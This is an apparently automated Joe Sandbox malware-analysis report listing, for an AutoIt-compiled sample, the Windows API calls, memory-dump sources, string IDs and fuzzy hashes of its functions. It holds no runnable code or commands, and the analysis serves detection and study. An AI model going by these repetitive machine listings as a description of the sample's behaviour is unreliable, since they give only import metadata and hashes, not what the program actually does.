                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                  • String ID: <$@
                                                                                  • API String ID: 146682121-1426351568
                                                                                  • Opcode ID: 9359edd747f1c59b58e93f97192228e210d86ed65999eff22abcc15888d8cc6b
                                                                                  • Instruction ID: 979f21350c2b23f0c2e758e73f9009e37ca1a7fb80ebd067a6eec528bdcba4c5
                                                                                  • Opcode Fuzzy Hash: 9359edd747f1c59b58e93f97192228e210d86ed65999eff22abcc15888d8cc6b
                                                                                  • Instruction Fuzzy Hash: 2F716670A00619DFCB18DF94D485A9EBBF0BF18304F0484ADE816AB3A2CB71ED55CB91
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00227206
                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0022723C
                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0022724D
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002272CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                  • String ID: DllGetClassObject
                                                                                  • API String ID: 753597075-1075368562
                                                                                  • Opcode ID: 0b751174579aeaf788aca559e169594ef917e2b5424cb71a9d6f7ca1f6fd16c5
                                                                                  • Instruction ID: 24358c053e1b5323c1c36569f2cd2c6f436c1f363a0ca2506e36e2269543eecb
                                                                                  • Opcode Fuzzy Hash: 0b751174579aeaf788aca559e169594ef917e2b5424cb71a9d6f7ca1f6fd16c5
                                                                                  • Instruction Fuzzy Hash: ED418F71A18215EFDB15CF94D884A9A7BB9EF44310F2481ADFD059F20AD7B0D954CBA0
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00253E35
                                                                                  • IsMenu.USER32(?), ref: 00253E4A
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00253E92
                                                                                  • DrawMenuBar.USER32 ref: 00253EA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                  • String ID: 0
                                                                                  • API String ID: 3076010158-4108050209
                                                                                  • Opcode ID: c7385275bf09afd03a0271a9c4190819bd16926362169a693562385ccd39803b
                                                                                  • Instruction ID: e61bde6a7b24aee458fc7c95fc67faf2ec608be4e330835d761d145a53ca99bd
                                                                                  • Opcode Fuzzy Hash: c7385275bf09afd03a0271a9c4190819bd16926362169a693562385ccd39803b
                                                                                  • Instruction Fuzzy Hash: 2F416C75A1020AAFDB10DF50E889E9AB7F5FF48395F044019ED05A7250D730AE68CF64
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00221E66
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00221E79
                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00221EA9
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 2081771294-1403004172
                                                                                  • Opcode ID: 27dc37d6f5f3391be5630f96678c2bfd669d827450a64bf666833c9959dc0d0e
                                                                                  • Instruction ID: 18f592f47bea79557be25352581de25bbe99699caf4474aa4d97cf907cdeb591
                                                                                  • Opcode Fuzzy Hash: 27dc37d6f5f3391be5630f96678c2bfd669d827450a64bf666833c9959dc0d0e
                                                                                  • Instruction Fuzzy Hash: E321F671A10214BEDB18AFA4EC49DFFB7BCDF65350B104129F825A71E1DB784A299620
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                  • API String ID: 176396367-4004644295
                                                                                  • Opcode ID: 4d0cdab67183c75e610f7a1c76202175424fce9d290112c5de4487f1a741c5ef
                                                                                  • Instruction ID: 6f56fb09397a4d8004bdd6773a08126f8c9c46155a132dc27e103bd39a677f94
                                                                                  • Opcode Fuzzy Hash: 4d0cdab67183c75e610f7a1c76202175424fce9d290112c5de4487f1a741c5ef
                                                                                  • Instruction Fuzzy Hash: FA312873A2257B4BCB68EF2DD8405BE33915BB1754B354029E851AB345FB71CD64C3A0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00252F8D
                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00252F94
                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00252FA9
                                                                                  • DestroyWindow.USER32(?), ref: 00252FB1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 3529120543-1011021900
                                                                                  • Opcode ID: 95e5eab88730a4a07601a09bc864d2fa3517115348fc59af663b9cc3c13da263
                                                                                  • Instruction ID: ff2813913da1f0a9b2e059a0ed473ef566a8bab7c5da76b22088074756718f78
                                                                                  • Opcode Fuzzy Hash: 95e5eab88730a4a07601a09bc864d2fa3517115348fc59af663b9cc3c13da263
                                                                                  • Instruction Fuzzy Hash: D9218B71224206EBEB104F64AC84EBB37B9EB5A366F100218FD50E65D0D771DC699B68
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001E4D1E,001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002), ref: 001E4D8D
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001E4DA0
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,001E4D1E,001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000), ref: 001E4DC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 47744f8e1852f4b02a9405aac50a7c530075e52cec630ce1443d37572c739eb9
                                                                                  • Instruction ID: 7959bf3c9dbba15291cec860d5f6bf827f6df84735b376c03a7ff7208e35757e
                                                                                  • Opcode Fuzzy Hash: 47744f8e1852f4b02a9405aac50a7c530075e52cec630ce1443d37572c739eb9
                                                                                  • Instruction Fuzzy Hash: BCF04F34A40708BFDB159F91EC4DBAEBBB5EF54752F1040A4F80AA22A0DB705E90DB94
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E9C
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001C4EAE
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EC0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 145871493-3689287502
                                                                                  • Opcode ID: 340b39713c6bfe847731c27a89b111fb6349354818c64a50bb637f3535c1cc01
                                                                                  • Instruction ID: e35eaec2ddb959e9f81e2cf42cccafa08902b4a9d803dc6773e518da4c9614d2
                                                                                  • Opcode Fuzzy Hash: 340b39713c6bfe847731c27a89b111fb6349354818c64a50bb637f3535c1cc01
                                                                                  • Instruction Fuzzy Hash: BBE08635A06B225F922117257C2CF5B6754AF92F637164119FC04E2140EB78CD0181B8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E62
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001C4E74
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E87
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 145871493-1355242751
                                                                                  • Opcode ID: 28b39919ab65a979d566b0facb85e50d0076c22c776a63d55f43c92c1e0802c1
                                                                                  • Instruction ID: f5c98786b7904521d58f13c90291c49f5d2e4020326a3f0710f85b383baabf5b
                                                                                  • Opcode Fuzzy Hash: 28b39919ab65a979d566b0facb85e50d0076c22c776a63d55f43c92c1e0802c1
                                                                                  • Instruction Fuzzy Hash: 31D0C235506B215B66221B287C2CE8B6B18AF86F133164118BC08A2110EF38CD01C1E8
                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0024A427
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0024A435
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0024A468
                                                                                  • CloseHandle.KERNEL32(?), ref: 0024A63D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 3488606520-0
                                                                                  • Opcode ID: 7e7e3e24591d14774c2fce88006e6957b0f73603c0ee12c1268ebe722675c174
                                                                                  • Instruction ID: f07c55973519dee45e7b9fa6a717c207bfad542fd6f2c97bb3b713fc596ea70d
                                                                                  • Opcode Fuzzy Hash: 7e7e3e24591d14774c2fce88006e6957b0f73603c0ee12c1268ebe722675c174
                                                                                  • Instruction Fuzzy Hash: 6FA1AE71604301AFD724DF28D886F2AB7E5AF98714F14885DF59A9B392D7B0EC418B82
                                                                                  APIs
                                                                                    • Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0022CF22,?), ref: 0022DDFD
                                                                                    • Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0022CF22,?), ref: 0022DE16
                                                                                    • Part of subcall function 0022E199: GetFileAttributesW.KERNEL32(?,0022CF95), ref: 0022E19A
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0022E473
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0022E4AC
                                                                                  • _wcslen.LIBCMT ref: 0022E5EB
                                                                                  • _wcslen.LIBCMT ref: 0022E603
                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0022E650
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3183298772-0
                                                                                  • Opcode ID: ecfc93a2d8e852d90f1ea5899c48ba27658faf6ed5a8be62144559c1063b0483
                                                                                  • Instruction ID: 80aa2a836f83797419189de732d1be098dd29401997c9849b249f73e68bdd5f6
                                                                                  • Opcode Fuzzy Hash: ecfc93a2d8e852d90f1ea5899c48ba27658faf6ed5a8be62144559c1063b0483
                                                                                  • Instruction Fuzzy Hash: FA5193B24187956BCB24EF90E8819DF73DCAF94340F00092EF689D3151EF74A598CB6A
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024BAA5
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024BB00
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0024BB63
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0024BBA6
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024BBB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                  • String ID:
                                                                                  • API String ID: 826366716-0
                                                                                  • Opcode ID: 5427d4ab9134859d1a7bd4872c97bf7d8c442d620c2ccdd03635f61b731757bf
                                                                                  • Instruction ID: bd356f225e956c214dd8e26b73dd2ef7a1d1b01b51ac8019f0b07dcd462ce483
                                                                                  • Opcode Fuzzy Hash: 5427d4ab9134859d1a7bd4872c97bf7d8c442d620c2ccdd03635f61b731757bf
                                                                                  • Instruction Fuzzy Hash: AF61BF31218201AFC719DF24C895F2ABBE5FF94308F54895CF4998B2A2DB31ED55CB92
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00228BCD
                                                                                  • VariantClear.OLEAUT32 ref: 00228C3E
                                                                                  • VariantClear.OLEAUT32 ref: 00228C9D
                                                                                  • VariantClear.OLEAUT32(?), ref: 00228D10
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00228D3B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                  • String ID:
                                                                                  • API String ID: 4136290138-0
                                                                                  • Opcode ID: 4c4d346536ff6ddfc4b0b1b2db5b60d20be667506b197feb98849f4394ea9a11
                                                                                  • Instruction ID: e6a4480110c63785eb398a8a5bb87de97401d838c045709c0c85054b39ff8a64
                                                                                  • Opcode Fuzzy Hash: 4c4d346536ff6ddfc4b0b1b2db5b60d20be667506b197feb98849f4394ea9a11
                                                                                  • Instruction Fuzzy Hash: 91516AB5A11219EFDB14CF68D884AAAB7F8FF89310B158569F905DB350E730E921CB90
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00238BAE
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00238BDA
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00238C32
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00238C57
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00238C5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                  • String ID:
                                                                                  • API String ID: 2832842796-0
                                                                                  • Opcode ID: f3780e34d9568f98ca62ff3e4da676bb31f9b08657f7804087ed820cf3ba76e5
                                                                                  • Instruction ID: 7f31ac3761099adaae747227659a9249dd13f360960b13c5b6cc7404ccba6bda
                                                                                  • Opcode Fuzzy Hash: f3780e34d9568f98ca62ff3e4da676bb31f9b08657f7804087ed820cf3ba76e5
                                                                                  • Instruction Fuzzy Hash: D1514975A002159FCB04DF64C885E69BBF5FF58314F088459E849AB3A2DB31ED51CF90
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00248F40
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00248FD0
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00248FEC
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00249032
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00249052
                                                                                    • Part of subcall function 001DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00231043,?,753CE610), ref: 001DF6E6
                                                                                    • Part of subcall function 001DF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0021FA64,00000000,00000000,?,?,00231043,?,753CE610,?,0021FA64), ref: 001DF70D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                  • String ID:
                                                                                  • API String ID: 666041331-0
                                                                                  • Opcode ID: cd78b788c3f5d99d8ab4541739f835cf4bc5c2d292ea1688b471a4f328d72b25
                                                                                  • Instruction ID: 33bdc33d1fdf8a061eb7c591f8cdebc9af2f168429121fbc56847b79ded2b867
                                                                                  • Opcode Fuzzy Hash: cd78b788c3f5d99d8ab4541739f835cf4bc5c2d292ea1688b471a4f328d72b25
                                                                                  • Instruction Fuzzy Hash: 36517A35614205DFC714DF68C484DADBBF1FF69314B5580A8E80A9B762DB31ED86CB90
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00256C33
                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00256C4A
                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00256C73
